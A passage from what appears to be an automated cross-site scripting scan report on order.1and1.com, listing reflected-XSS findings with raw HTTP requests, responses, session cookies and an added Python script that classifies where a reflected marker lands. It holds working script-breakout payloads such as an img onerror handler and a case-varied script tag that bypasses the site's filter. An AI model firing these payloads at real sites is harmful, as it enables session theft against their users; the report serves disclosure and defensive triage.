HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:46:55 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=taV4uMTIoUVFRS3VrcjhwajcpM2xfWTFIOzUdIR4eHRsdMi8vMjErLjIlJyYlIkc1YVZYZh4gG0s7ZXQ6LS4qKS4qKCspIysiISpiYykeJWx1Oy4vKyovLCksJyorJCU=; Expires=Fri, 07-Apr-2079 22:01:02 GMT; Path=/
ETag: 0de3fb6baffce8cb9b37d7e0115e4c0c
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 17448


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
NO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="FeatureGuaranteeMoneyback";UNOUNO.params.lastpage="FeatureGuaranteeMoneyback83c9e</ScRiPt ><ScRiPt>alert(1)</ScRiPt>eed4e62047d";UNOUNO.params.articles="1|tariff-beginner-package"};
   //-->
...[SNIP]...

1.8. http://order.1and1.com/xml/order/FeatureMarketingCtrCitysearch [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureMarketingCtrCitysearch

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureMarketingCtrCitysearch is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureMarketingCtrCitysearch. The payload 649d3</ScRiPt%20><img%20src%3da%20onerror%3dalert(1)>b5a1ad5a333 was submitted in the REST URL parameter 3. This input was returned as 649d3</ScRiPt ><img src=a onerror=alert(1)>b5a1ad5a333 in a subsequent request for the URL /xml/order/FeatureMarketingCtrCitysearch.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
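
Finding 1.5 above carries Firm rather than Certain confidence because the scanner could close the script element but did not find a full proof of concept, and this finding shows the usual next step: once </ScRiPt > moves the rest of the value into HTML text context, an <img> tag with an onerror handler runs JavaScript without any <script> tag at all. The following added example (not part of the report and not the scanner's own logic) shows how to triage a captured response body for that distinction: it locates a marker and reports whether it sits inside a double-quoted JavaScript string, in plain script code, in HTML text, or in an attribute, and lists any on* event-handler attributes the parser sees. The response bodies are constructed, trimmed versions of the UNOUNO.params script block in the responses above; the markers are the suffixes from findings 1.5 and 1.8, and the function names are assumptions.

```python
"""Triage a captured response: in which context did the reflected marker land?

Added example, not part of the XSS.CX report and not Burp Suite's own logic.
The response bodies are constructed from the UNOUNO.params script block the
report shows, trimmed to the relevant lines.
"""
import re
from html.parser import HTMLParser

# Constructed template mirroring the script block in the report's responses.
TEMPLATE = (
    '<!DOCTYPE html><html lang="en-US"><head><title>t</title>\n'
    '<script type="text/javascript">\n'
    'UNOUNO={{}};UNOUNO.params={{}};'
    'UNOUNO.params.page="{page}";UNOUNO.params.lastpage="{lastpage}";'
    'UNOUNO.params.articles="1|tariff-beginner-package";\n'
    '</script></head><body><p>order form</p></body></html>\n'
)

MARKER = "ca9d9974f55"  # suffix of the finding 1.5 payload above


class MarkerLocator(HTMLParser):
    """Records the syntactic context of every place `marker` shows up."""

    def __init__(self, marker):
        super().__init__(convert_charrefs=True)
        self.marker = marker
        self.in_script = False
        self.contexts = []   # "js-string", "js-code", "html-text" or "attribute"
        self.handlers = []   # (tag, attribute) for every on* attribute parsed

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.in_script = True
        for name, value in attrs:
            if name.startswith("on"):
                self.handlers.append((tag, name))
            if self.marker in name or self.marker in (value or ""):
                self.contexts.append("attribute")

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False

    def handle_data(self, data):
        if self.marker not in data:
            return
        if not self.in_script:
            self.contexts.append("html-text")
            return
        # Inside script data: an odd number of unescaped double quotes before
        # the marker means it sits inside a double-quoted JS string literal.
        before = data[: data.index(self.marker)]
        quotes = len(re.findall(r'(?<!\\)"', before))
        self.contexts.append("js-string" if quotes % 2 else "js-code")


def locate(body, marker):
    """Return (contexts, event_handlers) found while parsing one response body."""
    parser = MarkerLocator(marker)
    parser.feed(body)
    parser.close()
    return parser.contexts, parser.handlers


def render(page, lastpage):
    """Build a constructed response body with the given lastpage value."""
    return TEMPLATE.format(page=page, lastpage=lastpage)


def scenarios():
    """Three constructed bodies: plain reflection, script breakout, event handler."""
    return {
        # Value reflected intact: the marker is still inside the JS string.
        "reflected": render("FeatureEmailEmail", "FeatureEmailEmailf6a45" + MARKER),
        # Finding 1.5 (Firm): </ScRiPt > closes the script, marker is now HTML text.
        "breakout": render("FeatureEmailEmail", "FeatureEmailEmailf6a45</ScRiPt >" + MARKER),
        # Finding 1.8 (Certain): back in HTML context, an img event handler executes.
        "handler": render(
            "FeatureMarketingCtrCitysearch",
            "FeatureMarketingCtrCitysearch649d3</ScRiPt ><img src=a onerror=alert(1)>" + MARKER,
        ),
    }


if __name__ == "__main__":
    for name, body in scenarios().items():
        print(name, locate(body, MARKER))
```

Reading the three results side by side is the triage: a marker that stays in js-string context needs a payload that breaks out of the string or the element; one that lands in html-text context after the breakout is the Firm case, where the remaining obstacle is whatever the filter does to a following <script> tag; and a parsed on* attribute on an injected element is the Certain case the report documents with <img src=a onerror=alert(1)>.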

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request 1

GET /xml/order/FeatureMarketingCtrCitysearch649d3</ScRiPt%20><img%20src%3da%20onerror%3dalert(1)>b5a1ad5a333;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Request 2

GET /xml/order/FeatureMarketingCtrCitysearch;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:45:25 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=QbGExNDUrVFRUTmFXXjtzbTosNm9iXDRLPjggJCEhIB4gHhsbNTQuMTUoKikoJUo4ZFlbaSEjHk4nUWA9MDEtLDEtKy4sJi4lJC1lZiwhKFhhJzEyLi0yLywvKi0uJyg=; Expires=Fri, 07-Apr-2079 21:59:32 GMT; Path=/
ETag: e7dff180f54a2682d8bf1d6892e7732b
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 19187


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
s.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="FeatureMarketingCtrCitysearch";UNOUNO.params.lastpage="FeatureMarketingCtrCitysearch649d3</ScRiPt ><img src=a onerror=alert(1)>b5a1ad5a333";UNOUNO.params.articles="1|tariff-beginner-package"};
   //-->
...[SNIP]...

1.9. http://order.1and1.com/xml/order/FeatureMarketingCtrStat [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureMarketingCtrStat

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureMarketingCtrStat is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureMarketingCtrStat. The payload ccb50</ScRiPt%20><img%20src%3da%20onerror%3dalert(1)>3147a128d82 was submitted in the REST URL parameter 3. This input was returned as ccb50</ScRiPt ><img src=a onerror=alert(1)>3147a128d82 in a subsequent request for the URL /xml/order/FeatureMarketingCtrStat.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request 1

GET /xml/order/FeatureMarketingCtrStatccb50</ScRiPt%20><img%20src%3da%20onerror%3dalert(1)>3147a128d82;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Request 2

GET /xml/order/FeatureMarketingCtrStat;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:45:51 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=TaV4uMTIoUVFRS3VrcjhwajcpM2xfWTFIOzUdIR4eHRsdMi8vMjErLjIlJyYlIkc1YVZYZh4gG0s7ZXQ6LS4qKS4qKCspIysiISpiYykeJWx1Oy4vKyovLCksJyorJCU=; Expires=Fri, 07-Apr-2079 21:59:58 GMT; Path=/
ETag: 1df0b07d9edf1e6d8f16386731fd7196
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 20481


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="FeatureMarketingCtrStat";UNOUNO.params.lastpage="FeatureMarketingCtrStatccb50</ScRiPt ><img src=a onerror=alert(1)>3147a128d82";UNOUNO.params.articles="1|tariff-beginner-package"};
   //-->
...[SNIP]...

1.10. http://order.1and1.com/xml/order/FeatureSite-buildingCgi [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingCgi

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureSite-buildingCgi is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureSite-buildingCgi. The payload 31b1b</ScRiPt%20>c2edeb9151d was submitted in the REST URL parameter 3. This input was returned as 31b1b</ScRiPt >c2edeb9151d in a subsequent request for the URL /xml/order/FeatureSite-buildingCgi.

This behaviour demonstrates that it is possible to close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request 1

GET /xml/order/FeatureSite-buildingCgi31b1b</ScRiPt%20>c2edeb9151d;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Request 2

GET /xml/order/FeatureSite-buildingCgi;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:44:30 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=5al8vMjMpUlJSTF9sczlxazgqNG1gWjJJPDYeIh8fHhweHDAwMzIsLzMmKCcmI0g2YldZZx8hHEwlZnU7Li8rKi8rKSwqJCwjIitjZCofJlZ2PC8wLCswLSotKCssJSY=; Expires=Fri, 07-Apr-2079 21:58:38 GMT; Path=/
ETag: 59a5f7cd483dbd625b4e3b3399cb425e
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 17070


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="FeatureSite-buildingCgi";UNOUNO.params.lastpage="FeatureSite-buildingCgi31b1b</ScRiPt >c2edeb9151d";UNOUNO.params.articles="1|tariff-beginner-package"};
   //-->
...[SNIP]...

1.11. http://order.1and1.com/xml/order/FeatureSite-buildingDsc [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingDsc

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureSite-buildingDsc is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureSite-buildingDsc. The payload 5a570</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>5c34db446ac was submitted in the REST URL parameter 3. This input was returned as 5a570</ScRiPt ><ScRiPt>alert(1)</ScRiPt>5c34db446ac in a subsequent request for the URL /xml/order/FeatureSite-buildingDsc.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request 1

GET /xml/order/FeatureSite-buildingDsc5a570</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>5c34db446ac;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Request 2

GET /xml/order/FeatureSite-buildingDsc;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:42:53 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=dYlcnQUI4YWFhW25kazFpYzAiLGVYUipBNC4tMS4uLSstKygoKyokJyseIB8eG0AuWmZodi4wK1s0Xm0zJicjIicjISQiHCQbMTpyczkuNWVuNCcoJCMoJSIlICMkHR4=; Expires=Fri, 07-Apr-2079 21:57:00 GMT; Path=/
ETag: ea2128c5205999f874b214a18414c18c
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 18755


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="FeatureSite-buildingDsc";UNOUNO.params.lastpage="FeatureSite-buildingDsc5a570</ScRiPt ><ScRiPt>alert(1)</ScRiPt>5c34db446ac";UNOUNO.params.articles="1|tariff-beginner-package"};
   //-->
...[SNIP]...

1.12. http://order.1and1.com/xml/order/FeatureSite-buildingElements [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingElements

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureSite-buildingElements is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureSite-buildingElements. The payload 5314a</ScRiPt%20>fdf961380df was submitted in the REST URL parameter 3. This input was returned as 5314a</ScRiPt >fdf961380df in a subsequent request for the URL /xml/order/FeatureSite-buildingElements.

This behaviour demonstrates that it is possible to close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request 1

GET /xml/order/FeatureSite-buildingElements5314a</ScRiPt%20>fdf961380df;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Request 2

GET /xml/order/FeatureSite-buildingElements;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
